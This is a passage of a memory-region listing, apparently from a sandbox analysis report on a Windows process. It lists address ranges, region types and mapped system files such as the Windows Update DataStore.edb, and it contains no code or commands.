start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2146 start_va = 0xcb80000000 end_va = 0xcb800fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80000000" filename = "" Region: id = 2147 start_va = 0xcb80100000 end_va = 0xcb801fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80100000" filename = "" Region: id = 2148 start_va = 0xcb80200000 end_va = 0xcb80208fff entry_point = 0xcb80200000 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 2149 start_va = 0xcb80210000 end_va = 0xcb80210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80210000" filename = "" Region: id = 2150 start_va = 0xcb80220000 end_va = 0xcb8029ffff entry_point = 0x0 region_type = private name = "private_0x000000cb80220000" filename = "" Region: id = 2151 start_va = 0xcb802a0000 end_va = 0xcb802a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb802a0000" filename = "" Region: id = 2152 start_va = 0xcb802b0000 end_va = 0xcb802b6fff entry_point = 0x0 region_type = private name = "private_0x000000cb802b0000" filename = "" Region: id = 2153 start_va = 0xcb802c0000 end_va = 0xcb802c1fff entry_point = 0xcb802c0000 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 2154 start_va = 0xcb802d0000 end_va = 0xcb802d4fff entry_point = 0xcb802d0000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 2155 start_va = 0xcb802e0000 end_va = 0xcb802effff entry_point = 0xcb802e0000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 2156 start_va = 0xcb802f0000 end_va = 0xcb802f2fff entry_point = 0xcb802f0000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 2157 start_va = 0xcb80300000 end_va = 0xcb803fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80300000" filename = "" Region: id = 2158 start_va = 0xcb80400000 end_va = 0xcb804fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80400000" filename = "" Region: id = 2159 start_va = 0xcb80500000 end_va = 0xcb805fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80500000" filename = "" Region: id = 2160 start_va = 0xcb80600000 end_va = 0xcb8060ffff entry_point = 0xcb80600000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2161 start_va = 0xcb80610000 end_va = 0xcb8061ffff entry_point = 0xcb80610000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2162 start_va = 0xcb80620000 end_va = 0xcb8062ffff entry_point = 0xcb80620000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2163 start_va = 0xcb80630000 end_va = 0xcb8063ffff entry_point = 0xcb80630000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2164 start_va = 0xcb80640000 end_va = 0xcb8064ffff entry_point = 0xcb80640000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2165 start_va = 0xcb80650000 end_va = 0xcb8065ffff entry_point = 0xcb80650000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2166 start_va = 0xcb80660000 end_va = 0xcb8066ffff entry_point = 0xcb80660000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2167 start_va = 0xcb80670000 end_va = 0xcb8067ffff entry_point = 0xcb80670000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2168 start_va = 0xcb80680000 end_va = 0xcb8068ffff entry_point = 0xcb80680000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2169 start_va = 0xcb80690000 end_va = 0xcb8069ffff entry_point = 0xcb80690000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2170 start_va = 0xcb806a0000 end_va = 0xcb806affff entry_point = 0xcb806a0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2171 start_va = 0xcb806b0000 end_va = 0xcb806bffff entry_point = 0xcb806b0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2172 start_va = 0xcb806c0000 end_va = 0xcb806cffff entry_point = 0xcb806c0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2173 start_va = 0xcb806d0000 end_va = 0xcb806dffff entry_point = 0xcb806d0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2174 start_va = 0xcb806e0000 end_va = 0xcb806effff entry_point = 0xcb806e0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2175 start_va = 0xcb806f0000 end_va = 0xcb806fffff entry_point = 0xcb806f0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2176 start_va = 0xcb80700000 end_va = 0xcb8070ffff entry_point = 0xcb80700000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2177 start_va = 0xcb80710000 end_va = 0xcb8071ffff entry_point = 0xcb80710000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2178 start_va = 0xcb80720000 end_va = 0xcb8072ffff entry_point = 0xcb80720000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2179 start_va = 0xcb80730000 end_va = 0xcb8073ffff entry_point = 0xcb80730000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2180 start_va = 0xcb80740000 end_va = 0xcb8074ffff entry_point = 0xcb80740000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2181 start_va = 0xcb80750000 end_va = 0xcb8075ffff entry_point = 0xcb80750000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2182 start_va = 0xcb80760000 end_va = 0xcb8076ffff entry_point = 0xcb80760000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2183 start_va = 0xcb80770000 end_va = 0xcb8077ffff entry_point = 0xcb80770000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2184 start_va = 0xcb80780000 end_va = 0xcb8078ffff entry_point = 0xcb80780000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2185 start_va = 0xcb80790000 end_va = 0xcb8079ffff entry_point = 0xcb80790000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2186 start_va = 0xcb807a0000 end_va = 0xcb807affff entry_point = 0xcb807a0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2187 start_va = 0xcb807b0000 end_va = 0xcb807bffff entry_point = 0xcb807b0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2188 start_va = 0xcb807c0000 end_va = 0xcb807cffff entry_point = 0xcb807c0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2189 start_va = 0xcb807d0000 end_va = 0xcb807dffff entry_point = 0xcb807d0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2190 start_va = 0xcb807e0000 end_va = 0xcb807effff entry_point = 0xcb807e0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2191 start_va = 0xcb807f0000 end_va = 0xcb807fffff entry_point = 0xcb807f0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2192 start_va = 0xcb80800000 end_va = 0xcb808fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80800000" filename = "" Region: id = 2193 start_va = 0xcb80900000 end_va = 0xcb8090ffff entry_point = 0xcb80900000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2194 start_va = 0xcb80910000 end_va = 0xcb8091ffff entry_point = 0xcb80910000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2195 start_va = 0xcb80920000 end_va = 0xcb8092ffff entry_point = 0xcb80920000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2196 start_va = 0xcb80930000 end_va = 0xcb8093ffff entry_point = 0xcb80930000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2197 start_va = 0xcb80940000 end_va = 0xcb8094ffff entry_point = 0xcb80940000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2198 start_va = 0xcb80950000 end_va = 0xcb8095ffff entry_point = 0xcb80950000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2199 start_va = 0xcb80960000 end_va = 0xcb8096ffff entry_point = 0xcb80960000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2200 start_va = 0xcb80970000 end_va = 0xcb8097ffff entry_point = 0xcb80970000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2201 start_va = 0xcb80980000 end_va = 0xcb8098ffff entry_point = 0xcb80980000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2202 start_va = 0xcb80990000 end_va = 0xcb8099ffff entry_point = 0xcb80990000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2203 start_va = 0xcb809a0000 end_va = 0xcb809affff entry_point = 0xcb809a0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2204 start_va = 0xcb809b0000 end_va = 0xcb809bffff entry_point = 0xcb809b0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2205 start_va = 0xcb809c0000 end_va = 0xcb809cffff entry_point = 0xcb809c0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2206 start_va = 0xcb809d0000 end_va = 0xcb809dffff entry_point = 0xcb809d0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2207 start_va = 0xcb809e0000 end_va = 0xcb809effff entry_point = 0xcb809e0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2208 start_va = 0xcb809f0000 end_va = 0xcb809fffff entry_point = 0xcb809f0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2209 start_va = 0xcb80a00000 end_va = 0xcb80afffff entry_point = 0x0 region_type = private name = "private_0x000000cb80a00000" filename = "" Region: id = 2210 start_va = 0xcb80b00000 end_va = 0xcb80b01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80b00000" filename = "" Region: id = 2211 start_va = 0xcb80b10000 end_va = 0xcb80b11fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80b10000" filename = "" Region: id = 2212 start_va = 0xcb80b20000 end_va = 0xcb80b26fff entry_point = 0xcb80b20000 region_type = mapped_file name = "newdev.dll.mui" filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui") Region: id = 2213 start_va = 0xcb80b30000 end_va = 0xcb80b30fff entry_point = 0x0 region_type = private name = "private_0x000000cb80b30000" filename = "" Region: id = 2214 start_va = 0xcb80b40000 end_va = 0xcb80b40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80b40000" filename = "" Region: id = 2215 start_va = 0xcb80b50000 end_va = 0xcb80b57fff entry_point = 0x0 region_type = private name = "private_0x000000cb80b50000" filename = "" Region: id = 2216 start_va = 0xcb80b60000 end_va = 0xcb80b66fff entry_point = 0x0 region_type = private name = "private_0x000000cb80b60000" filename = "" Region: id = 2217 start_va = 0xcb80b70000 end_va = 0xcb80b7ffff entry_point = 0xcb80b70000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2218 start_va = 0xcb80b80000 end_va = 0xcb80b8ffff entry_point = 0xcb80b80000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2219 start_va = 0xcb80b90000 end_va = 0xcb80b9ffff entry_point = 0xcb80b90000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2220 start_va = 0xcb80ba0000 end_va = 0xcb80baffff entry_point = 0xcb80ba0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2221 start_va = 0xcb80bb0000 end_va = 0xcb80bbffff entry_point = 0xcb80bb0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2222 start_va = 0xcb80bc0000 end_va = 0xcb80bcffff entry_point = 0xcb80bc0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2223 start_va = 0xcb80bf0000 end_va = 0xcb80bfffff entry_point = 0x0 region_type = private name = "private_0x000000cb80bf0000" filename = "" Region: id = 2224 start_va = 0xcb80c00000 end_va = 0xcb80cfffff entry_point = 0x0 region_type = private name = "private_0x000000cb80c00000" filename = "" Region: id = 2225 start_va = 0xcb80d00000 end_va = 0xcb80dfffff entry_point = 0x0 region_type = private name = "private_0x000000cb80d00000" filename = "" Region: id = 2226 start_va = 0xcb80e00000 end_va = 0xcb80efffff entry_point = 0x0 region_type = private name = "private_0x000000cb80e00000" filename = "" Region: id = 2227 start_va = 0xcb80f00000 end_va = 0xcb80ffffff entry_point = 0x0 region_type = private name = "private_0x000000cb80f00000" filename = "" Region: id = 2228 start_va = 0xcb81000000 end_va = 0xcb810fffff entry_point = 0x0 region_type = private name = "private_0x000000cb81000000" filename = "" Region: id = 2229 start_va = 0xcb81100000 end_va = 0xcb811fffff entry_point = 0x0 region_type = private name = "private_0x000000cb81100000" filename = "" Region: id = 2230 start_va = 0xcb81200000 end_va = 0xcb812fffff entry_point = 0x0 region_type = private name = "private_0x000000cb81200000" filename = "" Region: id = 2231 start_va = 0xcb81300000 end_va = 0xcb813fffff entry_point = 0x0 region_type = private name = "private_0x000000cb81300000" filename = "" Region: id = 2232 start_va = 0xcb81400000 end_va = 0xcb814fffff entry_point = 0x0 region_type = private name = "private_0x000000cb81400000" filename = "" Region: id = 2233 start_va = 0xcb81500000 end_va = 0xcb815fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb81500000" filename = "" Region: id = 2234 start_va = 0xcb81600000 end_va = 0xcb816fffff entry_point = 0x0 region_type = private name = "private_0x000000cb81600000" filename = "" Region: id = 2235 start_va = 0xcb81780000 end_va = 0xcb817c0fff entry_point = 0x0 region_type = private name = "private_0x000000cb81780000" filename = "" Region: id = 2236 start_va = 0xcb817d0000 end_va = 0xcb817dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb817d0000" filename = "" Region: id = 2237 start_va = 0xcb817e0000 end_va = 0xcb817effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb817e0000" filename = "" Region: id = 2238 start_va = 0xcb817f0000 end_va = 0xcb817fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb817f0000" filename = "" Region: id = 2239 start_va = 0xcb81800000 end_va = 0xcb8180ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb81800000" filename = "" Region: id = 2240 start_va = 0xcb81810000 end_va = 0xcb8181ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb81810000" filename = "" Region: id = 2241 start_va = 0xcb81820000 end_va = 0xcb8182ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb81820000" filename = "" Region: id = 2242 start_va = 0xcb81830000 end_va = 0xcb81836fff entry_point = 0x0 region_type = private name = "private_0x000000cb81830000" filename = "" Region: id = 2243 start_va = 0xcb81840000 end_va = 0xcb818bffff entry_point = 0x0 region_type = private name = "private_0x000000cb81840000" filename = "" Region: id = 2244 start_va = 0xcb818c0000 end_va = 0xcb818cffff entry_point = 0x0 region_type = private name = "private_0x000000cb818c0000" filename = "" Region: id = 2245 start_va = 0xcb818d0000 end_va = 0xcb818d0fff entry_point = 0x0 region_type = private name = "private_0x000000cb818d0000" filename = "" Region: id = 2246 start_va = 0xcb818e0000 end_va = 0xcb818e0fff entry_point = 0x0 region_type = private name = "private_0x000000cb818e0000" filename = "" Region: id = 2247 start_va = 0xcb818f0000 end_va = 0xcb818f3fff entry_point = 0x0 region_type = private name = "private_0x000000cb818f0000" filename = "" Region: id = 2248 start_va = 0xcb81900000 end_va = 0xcb819fffff entry_point = 0x0 region_type = private name = "private_0x000000cb81900000" filename = "" Region: id = 2249 start_va = 0xcb81b00000 end_va = 0xcb81b01fff entry_point = 0x0 region_type = private name = "private_0x000000cb81b00000" filename = "" Region: id = 2250 start_va = 0xcb81b10000 end_va = 0xcb81b10fff entry_point = 0x0 region_type = private name = "private_0x000000cb81b10000" filename = "" Region: id = 2251 start_va = 0xcb81b20000 end_va = 0xcb81b2ffff entry_point = 0x0 region_type = private name = "private_0x000000cb81b20000" filename = "" Region: id = 2252 start_va = 0xcb81b30000 end_va = 0xcb81b37fff entry_point = 0x0 region_type = private name = "private_0x000000cb81b30000" filename = "" Region: id = 2253 start_va = 0xcb81b40000 end_va = 0xcb81b46fff entry_point = 0x0 region_type = private name = "private_0x000000cb81b40000" filename = "" Region: id = 2254 start_va = 0xcb81c50000 end_va = 0xcb81ccffff entry_point = 0x0 region_type = private name = "private_0x000000cb81c50000" filename = "" Region: id = 2255 start_va = 0xcb81cd0000 end_va = 0xcb81d1cfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb81cd0000" filename = "" Region: id = 2256 start_va = 0xcb81d20000 end_va = 0xcb81d26fff entry_point = 0x0 region_type = private name = "private_0x000000cb81d20000" filename = "" Region: id = 2257 start_va = 0xcb81d30000 end_va = 0xcb81d7cfff entry_point = 0x0 region_type = private name = "private_0x000000cb81d30000" filename = "" Region: id = 2258 start_va = 0xcb81d80000 end_va = 0xcb81d8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb81d80000" filename = "" Region: id = 2259 start_va = 0xcb81d90000 end_va = 0xcb81d9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb81d90000" filename = "" Region: id = 2260 start_va = 0xcb81da0000 end_va = 0xcb81daffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb81da0000" filename = "" Region: id = 2261 start_va = 0xcb81db0000 end_va = 0xcb81dbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb81db0000" filename = "" Region: id = 2262 start_va = 0xcb81dc0000 end_va = 0xcb81dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb81dc0000" filename = "" Region: id = 2263 start_va = 0xcb81dd0000 end_va = 0xcb81ddffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb81dd0000" filename = "" Region: id = 2264 start_va = 0xcb81e00000 end_va = 0xcb81efffff entry_point = 0x0 region_type = private name = "private_0x000000cb81e00000" filename = "" Region: id = 2265 start_va = 0xcb81f00000 end_va = 0xcb81ffffff entry_point = 0x0 region_type = private name = "private_0x000000cb81f00000" filename = "" Region: id = 2266 start_va = 0xcb82070000 end_va = 0xcb820effff entry_point = 0x0 region_type = private name = "private_0x000000cb82070000" filename = "" Region: id = 2267 start_va = 0xcb82100000 end_va = 0xcb821fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82100000" filename = "" Region: id = 2268 start_va = 0xcb82200000 end_va = 0xcb822fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82200000" filename = "" Region: id = 2269 start_va = 0xcb82300000 end_va = 0xcb823fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82300000" filename = "" Region: id = 2270 start_va = 0xcb82400000 end_va = 0xcb824fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82400000" filename = "" Region: id = 2271 start_va = 0xcb82500000 end_va = 0xcb825fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82500000" filename = "" Region: id = 2272 start_va = 0xcb82600000 end_va = 0xcb835fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82600000" filename = "" Region: id = 2273 start_va = 0xcb83600000 end_va = 0xcb836fffff entry_point = 0x0 region_type = private name = "private_0x000000cb83600000" filename = "" Region: id = 2274 start_va = 0xcb83c00000 end_va = 0xcb83c2ffff entry_point = 0x0 region_type = private name = "private_0x000000cb83c00000" filename = "" Region: id = 2275 start_va = 0xcb83c30000 end_va = 0xcb87c2ffff entry_point = 0x0 region_type = private name = "private_0x000000cb83c30000" filename = "" Region: id = 2276 start_va = 0xcb87c30000 end_va = 0xcb8bc2ffff entry_point = 0x0 region_type = private name = "private_0x000000cb87c30000" filename = "" Region: id = 2277 start_va = 0xcb8bc60000 end_va = 0xcb8bc60fff entry_point = 0xcb8bc60000 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 2278 start_va = 0xcb8bc70000 end_va = 0xcb8bc71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb8bc70000" filename = "" Region: id = 2279 start_va = 0xcb8bd10000 end_va = 0xcb8bd8ffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bd10000" filename = "" Region: id = 2280 start_va = 0xcb8bd90000 end_va = 0xcb8bd9ffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bd90000" filename = "" Region: id = 2281 start_va = 0xcb8bda0000 end_va = 0xcb8bdaffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bda0000" filename = "" Region: id = 2282 start_va = 0xcb8bdb0000 end_va = 0xcb8bdbffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bdb0000" filename = "" Region: id = 2283 start_va = 0xcb8bdc0000 end_va = 0xcb8bdcffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bdc0000" filename = "" Region: id = 2284 start_va = 0xcb8bdd0000 end_va = 0xcb8bddffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bdd0000" filename = "" Region: id = 2285 start_va = 0xcb8bde0000 end_va = 0xcb8bde7fff entry_point = 0x0 region_type = private name = "private_0x000000cb8bde0000" filename = "" Region: id = 2286 start_va = 0xcb8bdf0000 end_va = 0xcb8bdfffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bdf0000" filename = "" Region: id = 2287 start_va = 0xcb8be00000 end_va = 0xcb8be00fff entry_point = 0xcb8be00000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 2288 start_va = 0xcb8be10000 end_va = 0xcb8be13fff entry_point = 0xcb8be10000 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 2289 start_va = 0xcb8be20000 end_va = 0xcb8be37fff entry_point = 0x0 region_type = private name = "private_0x000000cb8be20000" filename = "" Region: id = 2290 start_va = 0xcb8beb0000 end_va = 0xcb8beb6fff entry_point = 0x0 region_type = private name = 